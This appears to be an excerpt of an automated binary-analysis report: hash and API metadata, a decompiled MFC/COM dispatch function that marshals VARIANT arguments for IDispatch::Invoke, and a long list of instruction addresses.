                                                                                                                                    • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                    • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                    • API String ID: 867647115-4034971020
                                                                                                                                    • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                    • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                                    • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                    • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                    			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                    				void* _t190;
                                                                                                                                    				signed int _t194;
                                                                                                                                    				intOrPtr* _t200;
                                                                                                                                    				signed int _t203;
                                                                                                                                    				signed int _t206;
                                                                                                                                    				intOrPtr* _t208;
                                                                                                                                    				intOrPtr _t211;
                                                                                                                                    				char _t230;
                                                                                                                                    				CHAR* _t236;
                                                                                                                                    				intOrPtr _t237;
                                                                                                                                    				signed short _t240;
                                                                                                                                    				signed int _t241;
                                                                                                                                    				signed int _t242;
                                                                                                                                    				signed int _t250;
                                                                                                                                    				signed int* _t257;
                                                                                                                                    				signed int _t258;
                                                                                                                                    				signed int _t277;
                                                                                                                                    				signed short* _t278;
                                                                                                                                    				signed short* _t279;
                                                                                                                                    				signed int _t290;
                                                                                                                                    				signed int _t291;
                                                                                                                                    				intOrPtr* _t293;
                                                                                                                                    				CHAR* _t295;
                                                                                                                                    				intOrPtr* _t296;
                                                                                                                                    				intOrPtr _t297;
                                                                                                                                    				signed int** _t299;
                                                                                                                                    				void* _t300;
                                                                                                                                    				void* _t301;
                                                                                                                                    				void* _t302;
                                                                                                                                    				void* _t313;
                                                                                                                                    
                                                                                                                                    				_push(0x7c);
                                                                                                                                    				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
                                                                                                                                    				_t257 = 0;
                                                                                                                                    				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                                                                    					L78:
                                                                                                                                    					return E10030DFF(_t190);
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x54)) = 0;
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x50)) = 0;
                                                                                                                                    				 *(_t300 - 0x4c) = 0;
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x48)) = 0;
                                                                                                                                    				 *(_t300 - 4) = 0;
                                                                                                                                    				E10030030(__edi, _t300 - 0x54, 0, 0x10);
                                                                                                                                    				_t302 = _t301 + 0xc;
                                                                                                                                    				if( *(_t300 + 0x18) != 0) {
                                                                                                                                    					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
                                                                                                                                    				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
                                                                                                                                    					 *((intOrPtr*)(_t300 - 0x48)) = 1;
                                                                                                                                    					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
                                                                                                                                    				}
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
                                                                                                                                    				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
                                                                                                                                    				_t194 =  *(_t300 - 0x4c);
                                                                                                                                    				_t308 = _t194 - _t257;
                                                                                                                                    				 *(_t300 - 4) = 1;
                                                                                                                                    				_t293 = 4;
                                                                                                                                    				if(_t194 == _t257) {
                                                                                                                                    					L37:
                                                                                                                                    					_t295 = 0;
                                                                                                                                    					E1002BDD9(_t300 - 0x44);
                                                                                                                                    					if( *(_t300 + 0x10) != _t257) {
                                                                                                                                    						_t295 = _t300 - 0x44;
                                                                                                                                    					}
                                                                                                                                    					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
                                                                                                                                    					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
                                                                                                                                    					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
                                                                                                                                    					_t289 = _t300 - 0x54;
                                                                                                                                    					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                                    					E1002DAF2(_t300 - 0x68);
                                                                                                                                    					_t203 =  *(_t300 - 0x4c);
                                                                                                                                    					if(_t203 == _t257) {
                                                                                                                                    						L46:
                                                                                                                                    						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                                    						E10014517(_t257, _t289, _t293, _t295, _t319);
                                                                                                                                    						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                                    						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                                    							L61:
                                                                                                                                    							_t295 =  *(_t300 + 0x10);
                                                                                                                                    							if(_t295 == _t257) {
                                                                                                                                    								L76:
                                                                                                                                    								 *(_t300 - 4) = 0;
                                                                                                                                    								_t190 = E1002CDE9(_t300 - 0x68, _t289);
                                                                                                                                    								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                                    								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                                    									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
                                                                                                                                    								}
                                                                                                                                    								goto L78;
                                                                                                                                    							}
                                                                                                                                    							if(_t295 == 0xc) {
                                                                                                                                    								L65:
                                                                                                                                    								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                                    								__eflags = _t206 - 0x13;
                                                                                                                                    								if(_t206 > 0x13) {
                                                                                                                                    									goto L76;
                                                                                                                                    								}
                                                                                                                                    								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
                                                                                                                                    									case 0:
                                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                                    										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                                    										goto L76;
                                                                                                                                    									case 1:
                                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                                    										__ecx =  *(__ebp - 0x3c);
                                                                                                                                    										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                                    										goto L76;
                                                                                                                                    									case 2:
                                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                                    										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                                    										goto L76;
                                                                                                                                    									case 3:
                                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                                    										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                                    										goto L76;
                                                                                                                                    									case 4:
                                                                                                                                    										__ecx =  *(__ebp - 0x3c);
                                                                                                                                    										__eax =  *(__ebp + 0x14);
                                                                                                                                    										 *__eax =  *(__ebp - 0x3c);
                                                                                                                                    										__ecx =  *(__ebp - 0x38);
                                                                                                                                    										 *(__eax + 4) = __ecx;
                                                                                                                                    										goto L76;
                                                                                                                                    									case 5:
                                                                                                                                    										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                                    										_push( *(__ebp - 0x3c));
                                                                                                                                    										__imp__#6();
                                                                                                                                    										goto L76;
                                                                                                                                    									case 6:
                                                                                                                                    										__ecx =  *(__ebp + 0x14);
                                                                                                                                    										__eax = 0;
                                                                                                                                    										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                                    										__eax = 0 | __eflags != 0x00000000;
                                                                                                                                    										 *__ecx = __eflags != 0;
                                                                                                                                    										goto L76;
                                                                                                                                    									case 7:
                                                                                                                                    										__edi =  *(__ebp + 0x14);
                                                                                                                                    										__esi = __ebp - 0x44;
                                                                                                                                    										asm("movsd");
                                                                                                                                    										asm("movsd");
                                                                                                                                    										asm("movsd");
                                                                                                                                    										asm("movsd");
                                                                                                                                    										__ebx = 0;
                                                                                                                                    										goto L76;
                                                                                                                                    									case 8:
                                                                                                                                    										goto L76;
                                                                                                                                    									case 9:
                                                                                                                                    										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                                    										goto L76;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							_t208 = _t300 - 0x44;
                                                                                                                                    							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                                    							_t293 = _t208;
                                                                                                                                    							_t321 = _t293 - _t257;
                                                                                                                                    							if(_t293 >= _t257) {
                                                                                                                                    								goto L65;
                                                                                                                                    							}
                                                                                                                                    							__imp__#9(_t300 - 0x44);
                                                                                                                                    							_push(_t293);
                                                                                                                                    							L49:
                                                                                                                                    							E1001FCED(_t257, _t293, _t295, _t321);
                                                                                                                                    							L50:
                                                                                                                                    							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                                    							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                                    								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                                    							}
                                                                                                                                    							_t211 = E100144EC(_t322, 0x20);
                                                                                                                                    							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                                    							_t323 = _t211 - _t257;
                                                                                                                                    							 *(_t300 - 4) = 4;
                                                                                                                                    							if(_t211 != _t257) {
                                                                                                                                    								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                                    								_push(_t257);
                                                                                                                                    								_push(_t257);
                                                                                                                                    								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
                                                                                                                                    							}
                                                                                                                                    							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                                    							_t293 = __imp__#7;
                                                                                                                                    							 *(_t300 - 4) = 1;
                                                                                                                                    							if( *_t293() != 0) {
                                                                                                                                    								_t139 = _t257 + 0x18; // 0x18
                                                                                                                                    								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                                    							}
                                                                                                                                    							_t296 = __imp__#6;
                                                                                                                                    							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                                    							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                                    							if( *_t293() != 0) {
                                                                                                                                    								_t143 = _t257 + 0xc; // 0xc
                                                                                                                                    								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                                    							}
                                                                                                                                    							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                                    							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                                    							if( *_t293() != 0) {
                                                                                                                                    								_t147 = _t257 + 0x14; // 0x14
                                                                                                                                    								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                                    							}
                                                                                                                                    							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                                    							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                                    							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                                    							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                                    							E10033135(_t300 + 0x14, 0x100505f8);
                                                                                                                                    							goto L61;
                                                                                                                                    						}
                                                                                                                                    						__imp__#9(_t300 - 0x44);
                                                                                                                                    						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                                    						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                                    							goto L50;
                                                                                                                                    						}
                                                                                                                                    						_push( *(_t300 + 0xc));
                                                                                                                                    						goto L49;
                                                                                                                                    					} else {
                                                                                                                                    						_t295 =  *(_t300 + 0x18);
                                                                                                                                    						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                                    						while(1) {
                                                                                                                                    							_t319 =  *_t295;
                                                                                                                                    							if( *_t295 == 0) {
                                                                                                                                    								goto L46;
                                                                                                                                    							}
                                                                                                                                    							_t230 =  *_t295;
                                                                                                                                    							__eflags = _t230 - 8;
                                                                                                                                    							if(_t230 == 8) {
                                                                                                                                    								L43:
                                                                                                                                    								__imp__#9(_t293);
                                                                                                                                    								L44:
                                                                                                                                    								_t293 = _t293 - 0x10;
                                                                                                                                    								_t295 =  &(_t295[1]);
                                                                                                                                    								__eflags = _t295;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							__eflags = _t230 - 0xe;
                                                                                                                                    							if(_t230 != 0xe) {
                                                                                                                                    								goto L44;
                                                                                                                                    							}
                                                                                                                                    							goto L43;
                                                                                                                                    						}
                                                                                                                                    						goto L46;
                                                                                                                                    					}
                                                                                                                                    				} else {
                                                                                                                                    					_t290 = 0x10;
                                                                                                                                    					_t291 = _t194 * _t290 >> 0x20;
                                                                                                                                    					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                                    					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                                    					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                                    					_t236 =  *(_t300 + 0x18);
                                                                                                                                    					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                                    					_t302 = _t302 + 0x10;
                                                                                                                                    					_t36 = _t277 - 0x10; // -16
                                                                                                                                    					_t278 = _t297 + _t36;
                                                                                                                                    					 *(_t300 - 0x14) = _t236;
                                                                                                                                    					 *(_t300 - 0x10) = _t278;
                                                                                                                                    					if( *_t236 == 0) {
                                                                                                                                    						goto L37;
                                                                                                                                    					}
                                                                                                                                    					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                                    					_t299 =  &(_t278[4]);
                                                                                                                                    					_t258 = _t237 - 4;
                                                                                                                                    					 *(_t300 - 0x1c) = _t299;
                                                                                                                                    					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                                    					do {
                                                                                                                                    						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                                    						_t279 =  *(_t300 - 0x10);
                                                                                                                                    						 *_t279 = _t240;
                                                                                                                                    						if((_t240 & 0x00000040) != 0) {
                                                                                                                                    							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                                    						}
                                                                                                                                    						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                                    						_t313 = _t241 - 0x4002;
                                                                                                                                    						if(_t313 > 0) {
                                                                                                                                    							_t242 = _t241 - 0x4003;
                                                                                                                                    							__eflags = _t242 - 0x12;
                                                                                                                                    							if(__eflags > 0) {
                                                                                                                                    								goto L35;
                                                                                                                                    							}
                                                                                                                                    							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
                                                                                                                                    								case 0:
                                                                                                                                    									goto L34;
                                                                                                                                    								case 1:
                                                                                                                                    									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                                    									_t258 = _t258 + _t293;
                                                                                                                                    									_t244 =  *_t258;
                                                                                                                                    									asm("sbb ecx, ecx");
                                                                                                                                    									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                                    									 *_t299 = _t244;
                                                                                                                                    									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
                                                                                                                                    									 *(_t300 - 4) = 3;
                                                                                                                                    									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                                    									__eflags =  *(_t300 - 0x2c);
                                                                                                                                    									 *(_t300 - 4) = 1;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                                    										E10014517(_t258, _t291, _t293, _t299, __eflags);
                                                                                                                                    									}
                                                                                                                                    									goto L35;
                                                                                                                                    								case 2:
                                                                                                                                    									goto L35;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t313 == 0) {
                                                                                                                                    								L34:
                                                                                                                                    								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                                    								_t258 = _t258 + _t293;
                                                                                                                                    								__eflags = _t258;
                                                                                                                                    								 *_t299 =  *_t258;
                                                                                                                                    								goto L35;
                                                                                                                                    							}
                                                                                                                                    							_t250 = _t241;
                                                                                                                                    							if(_t250 > 0x13) {
                                                                                                                                    								goto L35;
                                                                                                                                    							}
                                                                                                                                    							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
                                                                                                                                    								case 0:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                                    									__ax =  *__ebx;
                                                                                                                                    									goto L28;
                                                                                                                                    								case 1:
                                                                                                                                    									goto L34;
                                                                                                                                    								case 2:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                                    									__eax =  *(__ebp + 0x1c);
                                                                                                                                    									__ebx =  &(__ebx[2]);
                                                                                                                                    									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                                    									goto L35;
                                                                                                                                    								case 3:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                                    									__eax =  *(__ebp + 0x1c);
                                                                                                                                    									__ebx =  &(__ebx[2]);
                                                                                                                                    									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                                    									goto L35;
                                                                                                                                    								case 4:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                                    									__eax =  *__ebx;
                                                                                                                                    									goto L17;
                                                                                                                                    								case 5:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                                    									__eax =  *__ebx;
                                                                                                                                    									_push(__eax);
                                                                                                                                    									 *(__ebp - 0x1c) = __eax;
                                                                                                                                    									__imp__#2();
                                                                                                                                    									__eflags =  *(__ebp - 0x1c);
                                                                                                                                    									 *__esi = __eax;
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										goto L35;
                                                                                                                                    									}
                                                                                                                                    									__eflags = __eax;
                                                                                                                                    									if(__eflags != 0) {
                                                                                                                                    										goto L35;
                                                                                                                                    									}
                                                                                                                                    									goto L23;
                                                                                                                                    								case 6:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                                    									 *__ebx =  ~( *__ebx);
                                                                                                                                    									asm("sbb eax, eax");
                                                                                                                                    									L28:
                                                                                                                                    									 *__esi = __ax;
                                                                                                                                    									goto L35;
                                                                                                                                    								case 7:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                                    									__edi =  *(__ebp - 0x10);
                                                                                                                                    									__ebx =  &(__ebx[1]);
                                                                                                                                    									__esi =  *__ebx;
                                                                                                                                    									asm("movsd");
                                                                                                                                    									asm("movsd");
                                                                                                                                    									asm("movsd");
                                                                                                                                    									asm("movsd");
                                                                                                                                    									__esi =  *(__ebp - 0x1c);
                                                                                                                                    									_push(4);
                                                                                                                                    									_pop(__edi);
                                                                                                                                    									goto L35;
                                                                                                                                    								case 8:
                                                                                                                                    									L24:
                                                                                                                                    									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                                    									__ebx = __ebx + __edi;
                                                                                                                                    									__eax =  *__ebx;
                                                                                                                                    									_push(__eax);
                                                                                                                                    									__ecx = __ebp - 0x18;
                                                                                                                                    									 *(__ebp - 0x1c) = __eax;
                                                                                                                                    									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                                    									_push( *(__ebp - 0x18));
                                                                                                                                    									 *((char*)(__ebp - 4)) = 2;
                                                                                                                                    									__imp__#2();
                                                                                                                                    									__eflags =  *(__ebp - 0x1c);
                                                                                                                                    									 *__esi = __eax;
                                                                                                                                    									if( *(__ebp - 0x1c) == 0) {
                                                                                                                                    										L26:
                                                                                                                                    										__ecx =  *(__ebp - 0x18);
                                                                                                                                    										__eax =  *(__ebp - 0x10);
                                                                                                                                    										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                                    										 *( *(__ebp - 0x10)) = 8;
                                                                                                                                    										 *((char*)(__ebp - 4)) = 1;
                                                                                                                                    										__eax = E100012C0(__ecx);
                                                                                                                                    										goto L35;
                                                                                                                                    									}
                                                                                                                                    									__eflags = __eax;
                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                    										L23:
                                                                                                                                    										__eax = E100201BD(__ecx);
                                                                                                                                    										goto L24;
                                                                                                                                    									}
                                                                                                                                    									goto L26;
                                                                                                                                    								case 9:
                                                                                                                                    									goto L35;
                                                                                                                                    								case 0xa:
                                                                                                                                    									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                                    									_t258 = _t258 + _t293;
                                                                                                                                    									 *_t299 =  *_t258;
                                                                                                                                    									goto L35;
                                                                                                                                    								case 0xb:
                                                                                                                                    									__eax =  *(__ebp + 0x1c);
                                                                                                                                    									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                                    									 *(__ebp + 0x1c) = __eax;
                                                                                                                                    									__ebx =  &(__ebx[2]);
                                                                                                                                    									__eflags = __ebx;
                                                                                                                                    									L17:
                                                                                                                                    									__ecx =  *__eax;
                                                                                                                                    									 *__esi = __ecx;
                                                                                                                                    									 *(__esi + 4) = __eax;
                                                                                                                                    									goto L35;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L35:
                                                                                                                                    						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                                    						_t299 = _t299 - 0x10;
                                                                                                                                    						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                                    						 *(_t300 - 0x1c) = _t299;
                                                                                                                                    					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                                    					_t257 = 0;
                                                                                                                                    					goto L37;
                                                                                                                                    				}
                                                                                                                                    			}

































                                                                                                                                    0x1002df24
                                                                                                                                    0x1002df2b
                                                                                                                                    0x1002df30
                                                                                                                                    0x1002df33
                                                                                                                                    0x1002df33
                                                                                                                                    0x1002df3b
                                                                                                                                    0x1002df40
                                                                                                                                    0x1002df46
                                                                                                                                    0x1002df52
                                                                                                                                    0x1002df55
                                                                                                                                    0x00000000
                                                                                                                                    0x1002df55
                                                                                                                                    0x1002de8f
                                                                                                                                    0x1002de95
                                                                                                                                    0x1002de9c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de9e
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de4d
                                                                                                                                    0x1002de50
                                                                                                                                    0x1002de56
                                                                                                                                    0x1002de71
                                                                                                                                    0x1002de71
                                                                                                                                    0x1002de74
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de5c
                                                                                                                                    0x1002de5e
                                                                                                                                    0x1002de60
                                                                                                                                    0x1002de66
                                                                                                                                    0x1002de67
                                                                                                                                    0x1002de6d
                                                                                                                                    0x1002de6d
                                                                                                                                    0x1002de70
                                                                                                                                    0x1002de70
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de70
                                                                                                                                    0x1002de62
                                                                                                                                    0x1002de64
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de64
                                                                                                                                    0x00000000
                                                                                                                                    0x1002de71
                                                                                                                                    0x1002dbd0
                                                                                                                                    0x1002dbd4
                                                                                                                                    0x1002dbd5
                                                                                                                                    0x1002dbe4
                                                                                                                                    0x1002dbef
                                                                                                                                    0x1002dbf2
                                                                                                                                    0x1002dbfa
                                                                                                                                    0x1002dbfd
                                                                                                                                    0x1002dc00
                                                                                                                                    0x1002dc06
                                                                                                                                    0x1002dc06
                                                                                                                                    0x1002dc0a
                                                                                                                                    0x1002dc0d
                                                                                                                                    0x1002dc10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc16
                                                                                                                                    0x1002dc1b
                                                                                                                                    0x1002dc1e
                                                                                                                                    0x1002dc24
                                                                                                                                    0x1002dc27
                                                                                                                                    0x1002dc2a
                                                                                                                                    0x1002dc2d
                                                                                                                                    0x1002dc33
                                                                                                                                    0x1002dc36
                                                                                                                                    0x1002dc39
                                                                                                                                    0x1002dc43
                                                                                                                                    0x1002dc43
                                                                                                                                    0x1002dc46
                                                                                                                                    0x1002dc4e
                                                                                                                                    0x1002dc50
                                                                                                                                    0x1002dd6d
                                                                                                                                    0x1002dd72
                                                                                                                                    0x1002dd75
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd77
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd7e
                                                                                                                                    0x1002dd81
                                                                                                                                    0x1002dd83
                                                                                                                                    0x1002dd89
                                                                                                                                    0x1002dd93
                                                                                                                                    0x1002dd9a
                                                                                                                                    0x1002dd9c
                                                                                                                                    0x1002dda8
                                                                                                                                    0x1002ddac
                                                                                                                                    0x1002ddb1
                                                                                                                                    0x1002ddb5
                                                                                                                                    0x1002ddb9
                                                                                                                                    0x1002ddbb
                                                                                                                                    0x1002ddbe
                                                                                                                                    0x1002ddc3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc56
                                                                                                                                    0x1002dc56
                                                                                                                                    0x1002ddc6
                                                                                                                                    0x1002ddc6
                                                                                                                                    0x1002ddc9
                                                                                                                                    0x1002ddc9
                                                                                                                                    0x1002ddcd
                                                                                                                                    0x00000000
                                                                                                                                    0x1002ddcd
                                                                                                                                    0x1002dc5d
                                                                                                                                    0x1002dc61
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc67
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc7c
                                                                                                                                    0x1002dc7f
                                                                                                                                    0x1002dc81
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dca4
                                                                                                                                    0x1002dca8
                                                                                                                                    0x1002dcad
                                                                                                                                    0x1002dcb0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcb7
                                                                                                                                    0x1002dcbb
                                                                                                                                    0x1002dcc0
                                                                                                                                    0x1002dcc3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcca
                                                                                                                                    0x1002dccd
                                                                                                                                    0x1002dccf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcd3
                                                                                                                                    0x1002dcd6
                                                                                                                                    0x1002dcd8
                                                                                                                                    0x1002dcda
                                                                                                                                    0x1002dcdb
                                                                                                                                    0x1002dcde
                                                                                                                                    0x1002dce4
                                                                                                                                    0x1002dce8
                                                                                                                                    0x1002dcea
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcf0
                                                                                                                                    0x1002dcf2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd45
                                                                                                                                    0x1002dd48
                                                                                                                                    0x1002dd4c
                                                                                                                                    0x1002dd4e
                                                                                                                                    0x1002dd50
                                                                                                                                    0x1002dd50
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd55
                                                                                                                                    0x1002dd59
                                                                                                                                    0x1002dd5c
                                                                                                                                    0x1002dd5f
                                                                                                                                    0x1002dd61
                                                                                                                                    0x1002dd62
                                                                                                                                    0x1002dd63
                                                                                                                                    0x1002dd64
                                                                                                                                    0x1002dd65
                                                                                                                                    0x1002dd68
                                                                                                                                    0x1002dd6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcfd
                                                                                                                                    0x1002dcfd
                                                                                                                                    0x1002dd00
                                                                                                                                    0x1002dd02
                                                                                                                                    0x1002dd04
                                                                                                                                    0x1002dd05
                                                                                                                                    0x1002dd08
                                                                                                                                    0x1002dd0b
                                                                                                                                    0x1002dd10
                                                                                                                                    0x1002dd13
                                                                                                                                    0x1002dd17
                                                                                                                                    0x1002dd1d
                                                                                                                                    0x1002dd21
                                                                                                                                    0x1002dd23

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
